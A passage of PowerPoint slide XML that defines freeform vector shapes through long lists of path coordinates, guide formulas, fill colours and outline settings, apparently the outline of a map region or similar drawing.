                      <a:pt x="107" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="186"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="187"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="190"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="193"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="206"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="208"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="224"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="229"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="233"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="234"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36245" name="Freeform 378"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4284" y="2612"/>
                <a:ext cx="129" cy="244"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 70 w 129"/>
                  <a:gd name="T1" fmla="*/ 243 h 244"/>
                  <a:gd name="T2" fmla="*/ 61 w 129"/>
                  <a:gd name="T3" fmla="*/ 241 h 244"/>
                  <a:gd name="T4" fmla="*/ 58 w 129"/>
                  <a:gd name="T5" fmla="*/ 239 h 244"/>
                  <a:gd name="T6" fmla="*/ 52 w 129"/>
                  <a:gd name="T7" fmla="*/ 233 h 244"/>
                  <a:gd name="T8" fmla="*/ 44 w 129"/>
                  <a:gd name="T9" fmla="*/ 230 h 244"/>
                  <a:gd name="T10" fmla="*/ 39 w 129"/>
                  <a:gd name="T11" fmla="*/ 228 h 244"/>
                  <a:gd name="T12" fmla="*/ 35 w 129"/>
                  <a:gd name="T13" fmla="*/ 216 h 244"/>
                  <a:gd name="T14" fmla="*/ 26 w 129"/>
                  <a:gd name="T15" fmla="*/ 207 h 244"/>
                  <a:gd name="T16" fmla="*/ 16 w 129"/>
                  <a:gd name="T17" fmla="*/ 201 h 244"/>
                  <a:gd name="T18" fmla="*/ 14 w 129"/>
                  <a:gd name="T19" fmla="*/ 189 h 244"/>
                  <a:gd name="T20" fmla="*/ 20 w 129"/>
                  <a:gd name="T21" fmla="*/ 168 h 244"/>
                  <a:gd name="T22" fmla="*/ 31 w 129"/>
                  <a:gd name="T23" fmla="*/ 133 h 244"/>
                  <a:gd name="T24" fmla="*/ 27 w 129"/>
                  <a:gd name="T25" fmla="*/ 113 h 244"/>
                  <a:gd name="T26" fmla="*/ 14 w 129"/>
                  <a:gd name="T27" fmla="*/ 91 h 244"/>
                  <a:gd name="T28" fmla="*/ 18 w 129"/>
                  <a:gd name="T29" fmla="*/ 75 h 244"/>
                  <a:gd name="T30" fmla="*/ 22 w 129"/>
                  <a:gd name="T31" fmla="*/ 67 h 244"/>
                  <a:gd name="T32" fmla="*/ 7 w 129"/>
                  <a:gd name="T33" fmla="*/ 49 h 244"/>
                  <a:gd name="T34" fmla="*/ 4 w 129"/>
                  <a:gd name="T35" fmla="*/ 33 h 244"/>
                  <a:gd name="T36" fmla="*/ 7 w 129"/>
                  <a:gd name="T37" fmla="*/ 25 h 244"/>
                  <a:gd name="T38" fmla="*/ 14 w 129"/>
                  <a:gd name="T39" fmla="*/ 13 h 244"/>
                  <a:gd name="T40" fmla="*/ 32 w 129"/>
                  <a:gd name="T41" fmla="*/ 3 h 244"/>
                  <a:gd name="T42" fmla="*/ 42 w 129"/>
                  <a:gd name="T43" fmla="*/ 0 h 244"/>
                  <a:gd name="T44" fmla="*/ 49 w 129"/>
                  <a:gd name="T45" fmla="*/ 8 h 244"/>
                  <a:gd name="T46" fmla="*/ 53 w 129"/>
                  <a:gd name="T47" fmla="*/ 18 h 244"/>
                  <a:gd name="T48" fmla="*/ 61 w 129"/>
                  <a:gd name="T49" fmla="*/ 27 h 244"/>
                  <a:gd name="T50" fmla="*/ 56 w 129"/>
                  <a:gd name="T51" fmla="*/ 48 h 244"/>
                  <a:gd name="T52" fmla="*/ 71 w 129"/>
                  <a:gd name="T53" fmla="*/ 40 h 244"/>
                  <a:gd name="T54" fmla="*/ 86 w 129"/>
                  <a:gd name="T55" fmla="*/ 44 h 244"/>
                  <a:gd name="T56" fmla="*/ 96 w 129"/>
                  <a:gd name="T57" fmla="*/ 34 h 244"/>
                  <a:gd name="T58" fmla="*/ 106 w 129"/>
                  <a:gd name="T59" fmla="*/ 43 h 244"/>
                  <a:gd name="T60" fmla="*/ 116 w 129"/>
                  <a:gd name="T61" fmla="*/ 67 h 244"/>
                  <a:gd name="T62" fmla="*/ 129 w 129"/>
                  <a:gd name="T63" fmla="*/ 89 h 244"/>
                  <a:gd name="T64" fmla="*/ 120 w 129"/>
                  <a:gd name="T65" fmla="*/ 102 h 244"/>
                  <a:gd name="T66" fmla="*/ 102 w 129"/>
                  <a:gd name="T67" fmla="*/ 101 h 244"/>
                  <a:gd name="T68" fmla="*/ 80 w 129"/>
                  <a:gd name="T69" fmla="*/ 115 h 244"/>
                  <a:gd name="T70" fmla="*/ 80 w 129"/>
                  <a:gd name="T71" fmla="*/ 130 h 244"/>
                  <a:gd name="T72" fmla="*/ 84 w 129"/>
                  <a:gd name="T73" fmla="*/ 139 h 244"/>
                  <a:gd name="T74" fmla="*/ 69 w 129"/>
                  <a:gd name="T75" fmla="*/ 130 h 244"/>
                  <a:gd name="T76" fmla="*/ 58 w 129"/>
                  <a:gd name="T77" fmla="*/ 129 h 244"/>
                  <a:gd name="T78" fmla="*/ 56 w 129"/>
                  <a:gd name="T79" fmla="*/ 117 h 244"/>
                  <a:gd name="T80" fmla="*/ 42 w 129"/>
                  <a:gd name="T81" fmla="*/ 117 h 244"/>
                  <a:gd name="T82" fmla="*/ 39 w 129"/>
                  <a:gd name="T83" fmla="*/ 132 h 244"/>
                  <a:gd name="T84" fmla="*/ 34 w 129"/>
                  <a:gd name="T85" fmla="*/ 152 h 244"/>
                  <a:gd name="T86" fmla="*/ 29 w 129"/>
                  <a:gd name="T87" fmla="*/ 185 h 244"/>
                  <a:gd name="T88" fmla="*/ 39 w 129"/>
                  <a:gd name="T89" fmla="*/ 185 h 244"/>
                  <a:gd name="T90" fmla="*/ 41 w 129"/>
                  <a:gd name="T91" fmla="*/ 195 h 244"/>
                  <a:gd name="T92" fmla="*/ 47 w 129"/>
                  <a:gd name="T93" fmla="*/ 206 h 244"/>
                  <a:gd name="T94" fmla="*/ 52 w 129"/>
                  <a:gd name="T95" fmla="*/ 221 h 244"/>
                  <a:gd name="T96" fmla="*/ 66 w 129"/>
                  <a:gd name="T97" fmla="*/ 225 h 244"/>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29"/>
                  <a:gd name="T148" fmla="*/ 0 h 244"/>
                  <a:gd name="T149" fmla="*/ 129 w 129"/>
                  <a:gd name="T150" fmla="*/ 244 h 244"/>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29" h="244">
                    <a:moveTo>
                      <a:pt x="75" y="234"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="74" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="239"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="243"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="244"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="240"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="239"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="244"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="243"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="239"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="237"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="234"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="233"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="230"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="230"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="230"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="207"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="201"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="186"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="187"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="190"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="193"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="206"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="208"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="224"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="229"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="233"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="234"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36246" name="Freeform 379"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1812" y="3446"/>
                <a:ext cx="82" cy="90"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1 w 82"/>
                  <a:gd name="T1" fmla="*/ 75 h 90"/>
                  <a:gd name="T2" fmla="*/ 2 w 82"/>
                  <a:gd name="T3" fmla="*/ 72 h 90"/>
                  <a:gd name="T4" fmla="*/ 0 w 82"/>
                  <a:gd name="T5" fmla="*/ 67 h 90"/>
                  <a:gd name="T6" fmla="*/ 0 w 82"/>
                  <a:gd name="T7" fmla="*/ 62 h 90"/>
                  <a:gd name="T8" fmla="*/ 2 w 82"/>
                  <a:gd name="T9" fmla="*/ 58 h 90"/>
                  <a:gd name="T10" fmla="*/ 6 w 82"/>
                  <a:gd name="T11" fmla="*/ 54 h 90"/>
                  <a:gd name="T12" fmla="*/ 6 w 82"/>
                  <a:gd name="T13" fmla="*/ 51 h 90"/>
                  <a:gd name="T14" fmla="*/ 5 w 82"/>
                  <a:gd name="T15" fmla="*/ 43 h 90"/>
                  <a:gd name="T16" fmla="*/ 5 w 82"/>
                  <a:gd name="T17" fmla="*/ 35 h 90"/>
                  <a:gd name="T18" fmla="*/ 6 w 82"/>
                  <a:gd name="T19" fmla="*/ 31 h 90"/>
                  <a:gd name="T20" fmla="*/ 10 w 82"/>
